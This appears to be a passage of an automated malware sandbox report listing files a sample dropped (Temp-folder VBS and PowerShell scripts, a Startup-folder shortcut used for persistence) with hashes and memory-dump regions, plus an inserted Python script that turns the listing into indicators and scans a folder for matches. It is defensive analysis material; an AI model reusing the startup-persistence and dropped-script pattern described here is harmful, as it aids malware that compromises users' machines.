              2KB

              MD5

              6cf293cb4d80be23433eecf74ddb5503

              SHA1

              24fe4752df102c2ef492954d6b046cb5512ad408

              SHA256

              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

              SHA512

              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

              Filesize

              701B

              MD5

              5de8527438c860bfa3140dc420a03e52

              SHA1

              235af682986b3292f20d8d71a8671353f5d6e16d

              SHA256

              d9d92cd6e7a4507912965138b8d1eabb3f188f4dfcb61115ee99dc2c0fd43a92

              SHA512

              77c3a774a2235c55ad520f1bf0c71fa3d3f0e7cf478a78e0d4dd6d253ee12a9859acc9ee822664467387788a2655a18373c8fcf08ea0d001549d3d4391b00bf8

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              d3235ed022a42ec4338123ab87144afa

              SHA1

              5058608bc0deb720a585a2304a8f7cf63a50a315

              SHA256

              10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

              SHA512

              236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              548dd08570d121a65e82abb7171cae1c

              SHA1

              1a1b5084b3a78f3acd0d811cc79dbcac121217ab

              SHA256

              cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

              SHA512

              37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              e2a7fc20b443bab1d5f443e5cced0003

              SHA1

              fd875f15cf9bdea6d2e507365529fe151e26e399

              SHA256

              b977c66cd381a362076f0634005a18dbe3644cacb8d17f710076f39fb9e8d72f

              SHA512

              0442337dde316986c1b637ec1ee54159521a6b5b45cb1d6dcb07e16abd1babdd688d13132300f85e716c80c916f0e3ec04cf538a08a21a1efbf6737d6944ebed

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              d8b9a260789a22d72263ef3bb119108c

              SHA1

              376a9bd48726f422679f2cd65003442c0b6f6dd5

              SHA256

              d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

              SHA512

              550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              a6c9d692ed2826ecb12c09356e69cc09

              SHA1

              def728a6138cf083d8a7c61337f3c9dade41a37f

              SHA256

              a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

              SHA512

              2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              446dd1cf97eaba21cf14d03aebc79f27

              SHA1

              36e4cc7367e0c7b40f4a8ace272941ea46373799

              SHA256

              a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

              SHA512

              a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              e5ea61f668ad9fe64ff27dec34fe6d2f

              SHA1

              5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

              SHA256

              8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

              SHA512

              cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              0ee79fab36a9698b54d846b91efc77ed

              SHA1

              582ccc9c6c35b35868ade0fa47ced2f2026698aa

              SHA256

              70618c34c5b82202021fc293d84807ea3000890f3b8e33450d69d2a137d2662c

              SHA512

              1cc9f30d55f910165496539181dc121f6c1d7b3a07f7da1e5efb3ca9f52f28ceae6fde3ee0bf0782256d5ab901a7d09913326a1fa072281b8621e0ef2591f0d7

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              292B

              MD5

              464bfae90ec8c9c5babaa5e01e226edf

              SHA1

              f3101081559f77744b8c7b9c1e17210296d54d18

              SHA256

              607566895ef5450ee433f910b2772767e232702903830f5e371ee934fc1626e5

              SHA512

              f8bd808ee5bf2df3695acc2f4318ac3c4ae8e1edc5da2dcb506534d0b13dc15adf8622dbc752cecc9a25fef7643d3109ac1b69111087dc3e12f89e9cd47e4207

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              5722dc3c74eaab74358d24ca7f5ba47e

              SHA1

              bd7261b0ff786d6fd64148400a62fbf36687bb2e

              SHA256

              d00f9268fa6a2d245baa9039c6582d04772d1b80971c5fb97fb7608846571881

              SHA512

              07edfca0ca2bbff4e7c3faa78e7bb853ca1462ec8d0c5ed896e8fe44f3f7c4fc2cb297aa9e07b69626ddeb7e4b899c95291d968e0c409050d80b63a6c6d62ac4

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              560B

              MD5

              56fc4df3387e084b9117df81e8a25ef9

              SHA1

              f72d892772f0078e7391d68c14ff0f108958fce0

              SHA256

              454b854f519ffa3d147ee38d22673046fddce1d4d98d13cbf5aa411d367e18b3

              SHA512

              29506fb65b634d305c21f226b0e0cf48c65a5df72952892fb8fb9655e2661e2db6613f3fc52e5809abb025b15c7173d3b5db4a288a0ff805dc57c56fc4ec5f0e

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qk5y33mi.3vl.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\xx.vbs

              Filesize

              240B

              MD5

              7d22f89cf35058b7ea6930b0bf004cdd

              SHA1

              ebbc8e09268dd62d380f17899f21f8ede7f5527a

              SHA256

              38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3

              SHA512

              19cfae6e5a917902ec054106170851e14968858481a46636f3a0bf136c57f2789455d34b4511d0060c23cf479bc560a2ebe1c3fb1abee7469617e54b978e6c17

            • C:\Users\Admin\AppData\Local\Temp\xx1.ps1

              Filesize

              234B

              MD5

              aa2673120915805f0d3dcf1673c6fc61

              SHA1

              0ada860b2401d0b3b185f7c0aede8110b5851b8d

              SHA256

              76015afe0875b5f7af6112f180ece1e1da5946da18ed4cd9be2bbc43fb15ebd2

              SHA512

              ecbcce4462f7f683c9b13ef225c4b3d059971ea4ae7f2ff7ba7c458e0a941721d5aa100b5927358ec34599fd80f7159966d05fe6eb74d84bf180791562bfcc65

            • C:\Users\Admin\AppData\Local\Temp\xx2.vbs

              Filesize

              240B

              MD5

              7d22f89cf35058b7ea6930b0bf004cdd

              SHA1

              ebbc8e09268dd62d380f17899f21f8ede7f5527a

              SHA256

              38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3

              SHA512

              19cfae6e5a917902ec054106170851e14968858481a46636f3a0bf136c57f2789455d34b4511d0060c23cf479bc560a2ebe1c3fb1abee7469617e54b978e6c17

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyUWM.lnk

              Filesize

              1KB

              MD5

              e6f8b8f6d299b589dd4883dd7885806d

              SHA1

              b15a80b95cc2339781ba5b179bb44e8045a6cf43

              SHA256

              9519a4bee8923b03b3340eb38c45920141fcba5a61015104dc182e0bad99503f

              SHA512

              da817953e2f90795bbefa811a496a106f88cc9b3f1e1d781a160d3c5373509253be5edd6b96f7b18a9bc2eb62a46d6cbf33955a8ceeb5e3b7541f19944a660f9

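The dropped-file listing above is the part of this report that converts most directly into host indicators: the Temp-folder scripts (xx.vbs, xx1.ps1, xx2.vbs) and the Startup-folder shortcut eyUWM.lnk, each with a SHA256. As an added example (not code from tria.ge or from the sample itself), the Python below parses a flattened listing in exactly the bullet / label / value layout shown on this page into a de-duplicated indicator table, then scans a directory and flags files by SHA256 (strong match) or by file name (weak match). The excerpt embedded in SAMPLE_LISTING copies the xx.vbs, xx2.vbs and eyUWM.lnk paths, sizes and SHA256 values from this report, with xx.vbs repeated the way the report repeats entries; the scan directory, the file names renamed.dat / XX2.VBS / notes.txt, and the dropped.bin indicator whose hash is computed from constructed bytes are all constructed for the demonstration and are not indicators from the report.

```python
import hashlib
import os
import tempfile
from collections import Counter

# Field labels that sit on their own line in the flattened listing.
LABELS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}

# Constructed excerpt of the listing above. Paths, sizes and SHA256 values are
# copied from this report (MD5/SHA1/SHA512 lines left out); xx.vbs is listed
# twice on purpose, mirroring one entry per write of the same file.
SAMPLE_LISTING = r"""
• C:\Users\Admin\AppData\Local\Temp\xx.vbs
  Filesize
  240B
  SHA256
  38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3
• C:\Users\Admin\AppData\Local\Temp\xx.vbs
  Filesize
  240B
  SHA256
  38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3
• C:\Users\Admin\AppData\Local\Temp\xx2.vbs
  Filesize
  240B
  SHA256
  38a47a024c2e21e7f3bde9ce17d562a06512cda9c745cb5bf949a521cee139d3
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyUWM.lnk
  Filesize
  1KB
  SHA256
  9519a4bee8923b03b3340eb38c45920141fcba5a61015104dc182e0bad99503f
"""


def parse_listing(text):
    """Turn the flattened bullet listing into one dict per entry."""
    records, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):            # new entry: the dropped path
            current = {"path": line[1:].strip()}
            records.append(current)
            pending = None
        elif line in LABELS:                # label line; its value follows
            pending = line
        elif current is not None and pending is not None:
            current[pending.lower()] = line
            pending = None
    return records


def unique_iocs(records):
    """Collapse repeated entries: {(path, sha256): times listed}."""
    return Counter((r["path"], r.get("sha256")) for r in records)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_dir(root, iocs):
    """Flag files under root whose SHA256 (strong) or file name (weak)
    matches an indicator. Returns a sorted list of (relative path, reason)."""
    known_hashes = {sha for _, sha in iocs if sha}
    # Report paths are Windows paths; split on backslashes regardless of host.
    known_names = {p.replace("\\", "/").rsplit("/", 1)[-1].lower() for p, _ in iocs}
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if sha256_file(full) in known_hashes:
                hits.append((os.path.relpath(full, root), "hash"))
            elif name.lower() in known_names:
                hits.append((os.path.relpath(full, root), "name"))
    return sorted(hits)


def demo():
    """Build the indicator table and scan a constructed directory; returns both."""
    iocs = unique_iocs(parse_listing(SAMPLE_LISTING))
    payload = b"constructed stand-in for a dropped file"
    # Constructed indicator (not from the report) so the hash path is exercised.
    iocs[(r"C:\constructed\dropped.bin", hashlib.sha256(payload).hexdigest())] = 1
    with tempfile.TemporaryDirectory() as root:
        files = {"renamed.dat": payload,        # matches by hash only
                 "XX2.VBS": b"other content",   # matches by name only
                 "notes.txt": b"benign"}        # no match
        for name, data in files.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        return iocs, scan_dir(root, iocs)
```

Feed parse_listing the whole dropped-files section rather than the excerpt when using this against a report; the Counter keeps how many times each (path, hash) pair was listed without carrying the duplicate entries forward. Treat the two match kinds differently in triage: a hash hit identifies the exact dropped content, while a name hit on a generic name such as xx.vbs or xx1.ps1 only says the file is worth opening.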
            • memory/400-251-0x0000027824130000-0x0000027824140000-memory.dmp

              Filesize

              64KB

            • memory/400-252-0x0000027824130000-0x0000027824140000-memory.dmp

              Filesize

              64KB

            • memory/632-316-0x000001C3B6260000-0x000001C3B6270000-memory.dmp

              Filesize

              64KB

            • memory/632-315-0x000001C3B6260000-0x000001C3B6270000-memory.dmp

              Filesize

              64KB

            • memory/1532-495-0x0000000005440000-0x0000000005450000-memory.dmp

              Filesize

              64KB

            • memory/2004-388-0x0000000005850000-0x0000000005860000-memory.dmp

              Filesize

              64KB

            • memory/2264-403-0x0000012F7A650000-0x0000012F7A660000-memory.dmp

              Filesize

              64KB

            • memory/2264-404-0x0000012F7A650000-0x0000012F7A660000-memory.dmp

              Filesize

              64KB

            • memory/2264-405-0x0000012F7A650000-0x0000012F7A660000-memory.dmp

              Filesize

              64KB

            • memory/3472-197-0x000001ED58EB0000-0x000001ED58EC0000-memory.dmp

              Filesize

              64KB

            • memory/3472-198-0x000001ED58EB0000-0x000001ED58EC0000-memory.dmp

              Filesize

              64KB

            • memory/3860-234-0x0000000004EF0000-0x0000000004F56000-memory.dmp

              Filesize

              408KB

            • memory/3860-236-0x00000000060F0000-0x000000000612C000-memory.dmp

              Filesize

              240KB

            • memory/3860-231-0x0000000005520000-0x0000000005AC4000-memory.dmp

              Filesize

              5.6MB

            • memory/3860-224-0x0000000000400000-0x000000000045E000-memory.dmp

              Filesize

              376KB

            • memory/3860-232-0x0000000004F70000-0x0000000005002000-memory.dmp

              Filesize

              584KB

            • memory/3860-239-0x0000000004E70000-0x0000000004E80000-memory.dmp

              Filesize

              64KB

            • memory/3860-238-0x0000000006480000-0x000000000648A000-memory.dmp

              Filesize

              40KB

            • memory/3860-233-0x0000000004E70000-0x0000000004E80000-memory.dmp

              Filesize

              64KB

            • memory/3860-235-0x0000000005CD0000-0x0000000005CE2000-memory.dmp

              Filesize

              72KB

            • memory/3908-199-0x0000020DAF160000-0x0000020DAF170000-memory.dmp

              Filesize

              64KB

            • memory/3908-202-0x0000020DAF160000-0x0000020DAF170000-memory.dmp

              Filesize

              64KB

            • memory/3976-207-0x000001FA40810000-0x000001FA40820000-memory.dmp

              Filesize

              64KB

            • memory/4352-378-0x000002DFF2680000-0x000002DFF2690000-memory.dmp

              Filesize

              64KB

            • memory/4352-379-0x000002DFF2680000-0x000002DFF2690000-memory.dmp

              Filesize

              64KB

            • memory/4384-146-0x00000253D8370000-0x00000253D8380000-memory.dmp

              Filesize

              64KB

            • memory/4384-156-0x00000253D8370000-0x00000253D8380000-memory.dmp

              Filesize

              64KB

            • memory/4596-277-0x00000243702A0000-0x00000243702B0000-memory.dmp

              Filesize

              64KB

            • memory/4596-278-0x00000243702A0000-0x00000243702B0000-memory.dmp

              Filesize

              64KB

            • memory/4596-276-0x00000243702A0000-0x00000243702B0000-memory.dmp

              Filesize

              64KB

            • memory/4596-274-0x00000243702A0000-0x00000243702B0000-memory.dmp

              Filesize

              64KB

            • memory/4596-273-0x00000243702A0000-0x00000243702B0000-memory.dmp

              Filesize

              64KB

            • memory/4608-281-0x000001A171970000-0x000001A171980000-memory.dmp

              Filesize

              64KB

            • memory/4608-279-0x000001A171970000-0x000001A171980000-memory.dmp

              Filesize

              64KB

            • memory/4608-275-0x000001A171970000-0x000001A171980000-memory.dmp

              Filesize

              64KB

            • memory/4608-280-0x000001A171970000-0x000001A171980000-memory.dmp

              Filesize

              64KB

            • memory/4756-374-0x000002CC81480000-0x000002CC81490000-memory.dmp

              Filesize

              64KB

            • memory/4756-375-0x000002CC81480000-0x000002CC81490000-memory.dmp

              Filesize

              64KB

            • memory/4952-143-0x000001B8CC610000-0x000001B8CC620000-memory.dmp

              Filesize

              64KB

            • memory/4952-144-0x000001B8CC610000-0x000001B8CC620000-memory.dmp

              Filesize

              64KB

            • memory/4952-145-0x000001B8CC610000-0x000001B8CC620000-memory.dmp

              Filesize

              64KB

            • memory/4952-138-0x000001B8CC690000-0x000001B8CC6B2000-memory.dmp

              Filesize

              136KB

            • memory/4960-204-0x0000023AB0BB0000-0x0000023AB0BC0000-memory.dmp

              Filesize

              64KB

            • memory/4960-206-0x0000023AB0BB0000-0x0000023AB0BC0000-memory.dmp

              Filesize

              64KB

            • memory/4960-205-0x0000023AB0BB0000-0x0000023AB0BC0000-memory.dmp

              Filesize

              64KB

            • memory/4968-377-0x00000154536F0000-0x0000015453700000-memory.dmp

              Filesize

              64KB

            • memory/4968-376-0x00000154536F0000-0x0000015453700000-memory.dmp

              Filesize

              64KB

            • memory/5024-426-0x00000136F31C0000-0x00000136F31D0000-memory.dmp

              Filesize

              64KB

            • memory/5024-427-0x00000136F31C0000-0x00000136F31D0000-memory.dmp

              Filesize

              64KB

            • memory/5036-317-0x00000229AADB0000-0x00000229AADC0000-memory.dmp

              Filesize

              64KB
